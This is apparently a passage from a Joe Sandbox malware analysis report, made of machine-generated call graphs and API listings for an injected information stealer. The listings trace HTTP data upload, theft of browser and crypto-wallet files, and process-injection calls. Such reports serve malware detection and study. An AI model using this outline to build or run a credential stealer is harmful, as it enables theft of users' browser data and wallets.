73823->75138 73824->73822 73826 4125e6 73824->73826 73826->73822 73829 4104e7 lstrcpyA 73828->73829 73830 411c67 73829->73830 73831 4104e7 lstrcpyA 73830->73831 73832 411c75 GetSystemTime 73831->73832 73833 411c91 73832->73833 73834 41d016 __setmbcp_nolock 5 API calls 73833->73834 73835 411cc8 73834->73835 73835->72833 73838 4105e1 73836->73838 73837 410605 73837->72848 73838->73837 73839 4105f3 lstrcpyA lstrcatA 73838->73839 73839->73837 73841 410519 lstrcpyA 73840->73841 73842 401d07 73841->73842 73843 410519 lstrcpyA 73842->73843 73844 401d12 73843->73844 73845 410519 lstrcpyA 73844->73845 73846 401d1d 73845->73846 73847 410519 lstrcpyA 73846->73847 73848 401d34 73847->73848 73849 4169b6 73848->73849 73850 410549 2 API calls 73849->73850 73851 4169ec 73850->73851 73852 410549 2 API calls 73851->73852 73853 4169f9 73852->73853 73854 410549 2 API calls 73853->73854 73855 416a06 73854->73855 73856 4104e7 lstrcpyA 73855->73856 73857 416a13 73856->73857 73858 4104e7 lstrcpyA 73857->73858 73859 416a20 73858->73859 73860 4104e7 lstrcpyA 73859->73860 73861 416a2d 73860->73861 73862 4104e7 lstrcpyA 73861->73862 73863 416a3a 73862->73863 73864 4104e7 lstrcpyA 73863->73864 73865 416a47 73864->73865 73866 4104e7 lstrcpyA 73865->73866 73922 416a54 73866->73922 73869 4168c6 33 API calls 73869->73922 73870 416a98 StrCmpCA 73871 416af1 StrCmpCA 73870->73871 73870->73922 73872 416cd4 73871->73872 73871->73922 73875 41058d lstrcpyA 73872->73875 73876 416cdf 73875->73876 73879 4104e7 lstrcpyA 73876->73879 73877 410519 lstrcpyA 73877->73922 73880 416cec 73879->73880 73882 41058d lstrcpyA 73880->73882 73881 401cfd lstrcpyA 73881->73922 73913 416c2c 73882->73913 73883 4104e7 lstrcpyA 73884 416d0b 73883->73884 73885 41058d lstrcpyA 73884->73885 73887 416d15 73885->73887 73886 416b51 StrCmpCA 73888 416baa StrCmpCA 73886->73888 73886->73922 75150 416da2 73887->75150 73890 416bc0 StrCmpCA 73888->73890 73891 416ca3 73888->73891 73893 416c72 73890->73893 73894 416bd6 StrCmpCA 73890->73894 
73892 41058d lstrcpyA 73891->73892 73897 416cae 73892->73897 73895 41058d lstrcpyA 73893->73895 73898 416be8 StrCmpCA 73894->73898 73899 416c3e 73894->73899 73900 416c7d 73895->73900 73902 4104e7 lstrcpyA 73897->73902 73903 416c0a 73898->73903 73904 416bfa Sleep 73898->73904 73901 41058d lstrcpyA 73899->73901 73906 4104e7 lstrcpyA 73900->73906 73907 416c49 73901->73907 73908 416cbb 73902->73908 73905 41058d lstrcpyA 73903->73905 73904->73922 73910 416c15 73905->73910 73911 416c8a 73906->73911 73912 4104e7 lstrcpyA 73907->73912 73909 41058d lstrcpyA 73908->73909 73909->73913 73914 4104e7 lstrcpyA 73910->73914 73916 41058d lstrcpyA 73911->73916 73917 416c56 73912->73917 73913->73883 73918 416c22 73914->73918 73915 41683e 28 API calls 73915->73922 73916->73913 73919 41058d lstrcpyA 73917->73919 73920 41058d lstrcpyA 73918->73920 73919->73913 73920->73913 73921 41058d lstrcpyA 73921->73922 73922->73869 73922->73870 73922->73871 73922->73877 73922->73881 73922->73886 73922->73888 73922->73915 73922->73921 75141 4029f8 73922->75141 75144 402a09 73922->75144 75147 402a1a 73922->75147 75157 402a2b lstrcpyA 73922->75157 75158 402a3c lstrcpyA 73922->75158 75159 402a4d lstrcpyA 73922->75159 73923 416d28 73923->72859 73925 41058d lstrcpyA 73924->73925 73926 418257 73925->73926 73927 41058d lstrcpyA 73926->73927 73928 418262 73927->73928 73929 41058d lstrcpyA 73928->73929 73930 41826d 73929->73930 73930->72863 73932 410529 73931->73932 73933 41053e 73932->73933 73934 410536 lstrcpyA 73932->73934 73933->72876 73934->73933 73936 4109e6 GetVolumeInformationA 73935->73936 73937 4109df 73935->73937 73938 410a4d 73936->73938 73937->73936 73938->73938 73939 410a62 GetProcessHeap HeapAlloc 73938->73939 73940 410a7d 73939->73940 73941 410a8c wsprintfA lstrcatA 73939->73941 73942 4104e7 lstrcpyA 73940->73942 75160 411684 GetCurrentHwProfileA 73941->75160 73944 410a85 73942->73944 73947 41d016 __setmbcp_nolock 5 API calls 73944->73947 73945 410ac7 lstrlenA 75176 4123d5 lstrcpyA malloc 
strncpy 73945->75176 73949 410b2e 73947->73949 73948 410aea lstrcatA 73950 410b01 73948->73950 73949->72903 73951 4104e7 lstrcpyA 73950->73951 73952 410b18 73951->73952 73952->73944 73954 410519 lstrcpyA 73953->73954 73955 404b59 73954->73955 75180 404ab6 73955->75180 73957 404b65 73958 4104e7 lstrcpyA 73957->73958 73959 404b81 73958->73959 73960 4104e7 lstrcpyA 73959->73960 73961 404b91 73960->73961 73962 4104e7 lstrcpyA 73961->73962 73963 404ba1 73962->73963 73964 4104e7 lstrcpyA 73963->73964 73965 404bb1 73964->73965 73966 4104e7 lstrcpyA 73965->73966 73967 404bc1 InternetOpenA StrCmpCA 73966->73967 73968 404bf5 73967->73968 73969 405194 InternetCloseHandle 73968->73969 73970 411c4a 7 API calls 73968->73970 73980 4051e1 73969->73980 73971 404c15 73970->73971 73972 4105c7 2 API calls 73971->73972 73973 404c28 73972->73973 73974 41058d lstrcpyA 73973->73974 73975 404c33 73974->73975 73976 410609 3 API calls 73975->73976 73977 404c5f 73976->73977 73978 41058d lstrcpyA 73977->73978 73979 404c6a 73978->73979 73982 410609 3 API calls 73979->73982 73981 41d016 __setmbcp_nolock 5 API calls 73980->73981 73983 405235 73981->73983 73984 404c8b 73982->73984 74086 4139c2 StrCmpCA 73983->74086 73985 41058d lstrcpyA 73984->73985 73986 404c96 73985->73986 73987 4105c7 2 API calls 73986->73987 73988 404cb8 73987->73988 73989 41058d lstrcpyA 73988->73989 73990 404cc3 73989->73990 73991 410609 3 API calls 73990->73991 73992 404ce4 73991->73992 73993 41058d lstrcpyA 73992->73993 73994 404cef 73993->73994 73995 410609 3 API calls 73994->73995 73996 404d10 73995->73996 73997 41058d lstrcpyA 73996->73997 73998 404d1b 73997->73998 73999 410609 3 API calls 73998->73999 74000 404d3d 73999->74000 74001 4105c7 2 API calls 74000->74001 74002 404d48 74001->74002 74003 41058d lstrcpyA 74002->74003 74004 404d53 74003->74004 74005 404d69 InternetConnectA 74004->74005 74005->73969 74006 404d97 HttpOpenRequestA 74005->74006 74007 404dd7 74006->74007 74008 405188 InternetCloseHandle 74006->74008 
74009 404dfb 74007->74009 74010 404ddf InternetSetOptionA 74007->74010 74008->73969 74011 410609 3 API calls 74009->74011 74010->74009 74012 404e11 74011->74012 74013 41058d lstrcpyA 74012->74013 74014 404e1c 74013->74014 74015 4105c7 2 API calls 74014->74015 74016 404e3e 74015->74016 74017 41058d lstrcpyA 74016->74017 74018 404e49 74017->74018 74019 410609 3 API calls 74018->74019 74020 404e6a 74019->74020 74021 41058d lstrcpyA 74020->74021 74022 404e75 74021->74022 74023 410609 3 API calls 74022->74023 74024 404e97 74023->74024 74025 41058d lstrcpyA 74024->74025 74026 404ea2 74025->74026 74027 410609 3 API calls 74026->74027 74028 404ec3 74027->74028 74029 41058d lstrcpyA 74028->74029 74030 404ece 74029->74030 74031 410609 3 API calls 74030->74031 74032 404eef 74031->74032 74033 41058d lstrcpyA 74032->74033 74034 404efa 74033->74034 74035 4105c7 2 API calls 74034->74035 74036 404f19 74035->74036 74037 41058d lstrcpyA 74036->74037 74038 404f24 74037->74038 74039 410609 3 API calls 74038->74039 74040 404f45 74039->74040 74041 41058d lstrcpyA 74040->74041 74042 404f50 74041->74042 74043 410609 3 API calls 74042->74043 74044 404f71 74043->74044 74045 41058d lstrcpyA 74044->74045 74046 404f7c 74045->74046 74047 4105c7 2 API calls 74046->74047 74048 404f9e 74047->74048 74049 41058d lstrcpyA 74048->74049 74050 404fa9 74049->74050 74051 410609 3 API calls 74050->74051 74052 404fca 74051->74052 74053 41058d lstrcpyA 74052->74053 74054 404fd5 74053->74054 74055 410609 3 API calls 74054->74055 74056 404ff7 74055->74056 74057 41058d lstrcpyA 74056->74057 74058 405002 74057->74058 74059 410609 3 API calls 74058->74059 74060 405023 74059->74060 74061 41058d lstrcpyA 74060->74061 74062 40502e 74061->74062 74063 410609 3 API calls 74062->74063 74064 40504f 74063->74064 74065 41058d lstrcpyA 74064->74065 74066 40505a 74065->74066 74067 4105c7 2 API calls 74066->74067 74068 405079 74067->74068 74069 41058d lstrcpyA 74068->74069 74070 405084 74069->74070 74071 4104e7 lstrcpyA 
74070->74071 74072 40509f 74071->74072 74073 4105c7 2 API calls 74072->74073 74074 4050b6 74073->74074 74075 4105c7 2 API calls 74074->74075 74076 4050c7 74075->74076 74077 41058d lstrcpyA 74076->74077 74078 4050d2 74077->74078 74079 4050e8 lstrlenA lstrlenA HttpSendRequestA 74078->74079 74080 40515c InternetReadFile 74079->74080 74081 405176 InternetCloseHandle 74080->74081 74084 40511c 74080->74084 74082 402920 74081->74082 74082->74008 74083 410609 3 API calls 74083->74084 74084->74080 74084->74081 74084->74083 74085 41058d lstrcpyA 74084->74085 74085->74084 74087 4139e1 ExitProcess 74086->74087 74088 4139e8 strtok_s 74086->74088 74089 413b48 74088->74089 74101 413a04 74088->74101 74089->72911 74090 413b2a strtok_s 74090->74089 74090->74101 74091 413a21 StrCmpCA 74091->74090 74091->74101 74092 413a75 StrCmpCA 74092->74090 74092->74101 74093 413ab4 StrCmpCA 74093->74090 74093->74101 74094 413af4 StrCmpCA 74094->74090 74095 413b16 StrCmpCA 74095->74090 74096 413a59 StrCmpCA 74096->74090 74096->74101 74097 413ac9 StrCmpCA 74097->74090 74097->74101 74098 413a3d StrCmpCA 74098->74090 74098->74101 74099 413a9f StrCmpCA 74099->74090 74099->74101 74100 413ade StrCmpCA 74100->74090 74101->74090 74101->74091 74101->74092 74101->74093 74101->74094 74101->74095 74101->74096 74101->74097 74101->74098 74101->74099 74101->74100 74102 410549 2 API calls 74101->74102 74102->74101 74104 410519 lstrcpyA 74103->74104 74105 405f64 74104->74105 74106 404ab6 5 API calls 74105->74106 74107 405f70 74106->74107 74108 4104e7 lstrcpyA 74107->74108 74109 405f8c 74108->74109 74110 4104e7 lstrcpyA 74109->74110 74111 405f9c 74110->74111 74112 4104e7 lstrcpyA 74111->74112 74113 405fac 74112->74113 74114 4104e7 lstrcpyA 74113->74114 74115 405fbc 74114->74115 74116 4104e7 lstrcpyA 74115->74116 74117 405fcc InternetOpenA StrCmpCA 74116->74117 74118 406000 74117->74118 74119 4066ff InternetCloseHandle 74118->74119 74121 411c4a 7 API calls 74118->74121 75186 408048 CryptStringToBinaryA 74119->75186 
74123 406020 74121->74123 74124 4105c7 2 API calls 74123->74124 74126 406033 74124->74126 74125 410549 2 API calls 74127 406739 74125->74127 74128 41058d lstrcpyA 74126->74128 74129 410609 3 API calls 74127->74129 74132 40603e 74128->74132 74130 406750 74129->74130 74131 41058d lstrcpyA 74130->74131 74137 40675b 74131->74137 74133 410609 3 API calls 74132->74133 74134 40606a 74133->74134 74135 41058d lstrcpyA 74134->74135 74136 406075 74135->74136 74139 410609 3 API calls 74136->74139 74138 41d016 __setmbcp_nolock 5 API calls 74137->74138 74140 4067eb 74138->74140 74141 406096 74139->74141 74270 41343f strtok_s 74140->74270 74142 41058d lstrcpyA 74141->74142 74143 4060a1 74142->74143 74144 4105c7 2 API calls 74143->74144 74145 4060c3 74144->74145 74146 41058d lstrcpyA 74145->74146 74147 4060ce 74146->74147 74148 410609 3 API calls 74147->74148 74149 4060ef 74148->74149 74150 41058d lstrcpyA 74149->74150 74151 4060fa 74150->74151 74152 410609 3 API calls 74151->74152 74153 40611b 74152->74153 74154 41058d lstrcpyA 74153->74154 74155 406126 74154->74155 74156 410609 3 API calls 74155->74156 74157 406148 74156->74157 74158 4105c7 2 API calls 74157->74158 74159 406153 74158->74159 74160 41058d lstrcpyA 74159->74160 74161 40615e 74160->74161 74162 406174 InternetConnectA 74161->74162 74162->74119 74163 4061a2 HttpOpenRequestA 74162->74163 74164 4061e2 74163->74164 74165 4066f3 InternetCloseHandle 74163->74165 74166 406206 74164->74166 74167 4061ea InternetSetOptionA 74164->74167 74165->74119 74168 410609 3 API calls 74166->74168 74167->74166 74169 40621c 74168->74169 74170 41058d lstrcpyA 74169->74170 74171 406227 74170->74171 74172 4105c7 2 API calls 74171->74172 74173 406249 74172->74173 74174 41058d lstrcpyA 74173->74174 74175 406254 74174->74175 74176 410609 3 API calls 74175->74176 74177 406275 74176->74177 74178 41058d lstrcpyA 74177->74178 74179 406280 74178->74179 74180 410609 3 API calls 74179->74180 74181 4062a2 74180->74181 74182 41058d lstrcpyA 74181->74182 
74183 4062ad 74182->74183 74184 410609 3 API calls 74183->74184 74185 4062cf 74184->74185 74186 41058d lstrcpyA 74185->74186 74187 4062da 74186->74187 74188 410609 3 API calls 74187->74188 74189 4062fb 74188->74189 74190 41058d lstrcpyA 74189->74190 74191 406306 74190->74191 74192 4105c7 2 API calls 74191->74192 74193 406325 74192->74193 74194 41058d lstrcpyA 74193->74194 74195 406330 74194->74195 74196 410609 3 API calls 74195->74196 74197 406351 74196->74197 74198 41058d lstrcpyA 74197->74198 74199 40635c 74198->74199 74200 410609 3 API calls 74199->74200 74201 40637d 74200->74201 74202 41058d lstrcpyA 74201->74202 74203 406388 74202->74203 74204 4105c7 2 API calls 74203->74204 74205 4063aa 74204->74205 74206 41058d lstrcpyA 74205->74206 74207 4063b5 74206->74207 74208 410609 3 API calls 74207->74208 74209 4063d6 74208->74209 74210 41058d lstrcpyA 74209->74210 74211 4063e1 74210->74211 74212 410609 3 API calls 74211->74212 74213 406403 74212->74213 74214 41058d lstrcpyA 74213->74214 74215 40640e 74214->74215 74216 410609 3 API calls 74215->74216 74217 40642f 74216->74217 74218 41058d lstrcpyA 74217->74218 74219 40643a 74218->74219 74220 410609 3 API calls 74219->74220 74221 40645b 74220->74221 74222 41058d lstrcpyA 74221->74222 74223 406466 74222->74223 74224 410609 3 API calls 74223->74224 74225 406487 74224->74225 74226 41058d lstrcpyA 74225->74226 74227 406492 74226->74227 74228 410609 3 API calls 74227->74228 74229 4064b3 74228->74229 74230 41058d lstrcpyA 74229->74230 74231 4064be 74230->74231 74232 410609 3 API calls 74231->74232 74233 4064df 74232->74233 74234 41058d lstrcpyA 74233->74234 74235 4064ea 74234->74235 74236 4105c7 2 API calls 74235->74236 74237 406506 74236->74237 74238 41058d lstrcpyA 74237->74238 74239 406511 74238->74239 74240 410609 3 API calls 74239->74240 74241 406532 74240->74241 74242 41058d lstrcpyA 74241->74242 74243 40653d 74242->74243 74244 410609 3 API calls 74243->74244 74245 40655f 74244->74245 74246 41058d lstrcpyA 74245->74246 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
• Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
• Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
• Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Control-flow Graph
APIs
• wsprintfA.USER32 ref: 00414D1C
• FindFirstFileA.KERNEL32(?,?), ref: 00414D33
• _memset.LIBCMT ref: 00414D4F
• _memset.LIBCMT ref: 00414D60
• StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
• StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
• wsprintfA.USER32 ref: 00414DC2
• StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
• wsprintfA.USER32 ref: 00414DFF
• wsprintfA.USER32 ref: 00414E16
  • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
  • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
  • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
  • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
  • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
  • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
• _memset.LIBCMT ref: 00414E28
• lstrcatA.KERNEL32(?,?), ref: 00414E3D
• strtok_s.MSVCRT ref: 00414E82
• _memset.LIBCMT ref: 00414E94
• lstrcatA.KERNEL32(?,?), ref: 00414EA9
• strtok_s.MSVCRT ref: 00414EC2
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
• DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
• CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
  • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
• DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
• strtok_s.MSVCRT ref: 00414FE7
• FindNextFileA.KERNELBASE(?,?), ref: 00415105
• FindClose.KERNEL32(?), ref: 00415125
Strings
Memory Dump Source
• Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
Yara matches
Similarity
• API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
• String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
• API String ID: 956187361-332874205
• Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
• Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
• Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
• Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                            • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                            • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                              • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                              • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                              • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                              • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                            • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                            • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                            • API String ID: 4173076446-1189830961
                                                                                                                            • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                            • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                            • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                            • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCAF688,00001000), ref: 6CC235D5
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC235E0
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC235FD
                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC2363F
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC2369F
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC236E4
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC23773
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC2377E
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC237BD
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC237C4
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC237CB
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC23801
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC23883
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC23902
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC23918
                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC2394C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                            • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                            • API String ID: 301339242-3790311718
                                                                                                                            • Opcode ID: 4beefb42264f6f66f99be3af24fd980ba7f763234d9a691554eff280fe6e0afe
                                                                                                                            • Instruction ID: c5d28db8f31fb233b76978c9533a52be0b6f4c3300fe9a72af5649d728b7c8fa
                                                                                                                            • Opcode Fuzzy Hash: 4beefb42264f6f66f99be3af24fd980ba7f763234d9a691554eff280fe6e0afe
                                                                                                                            • Instruction Fuzzy Hash: 92B1A371B043009FDB08DF69D85965E77F9FB8A700F098A2EE899D7760E774D8018B91

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                            • API String ID: 2178766154-445461498
                                                                                                                            • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                            • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                            • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                            • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                              • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
